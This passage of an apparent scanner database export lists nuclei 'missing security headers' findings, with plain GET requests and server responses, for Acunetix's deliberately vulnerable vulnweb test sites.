style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 423, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:41:04.029Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:46 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 424, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:41:04.173Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 425, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:41:04.319Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 426, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:04.458Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 427, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:41:04.602Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 428, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:41:04.742Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:56 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 429, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:04.877Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 430, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:41:05.018Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 431, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:41:05.173Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 432, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:41:05.309Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 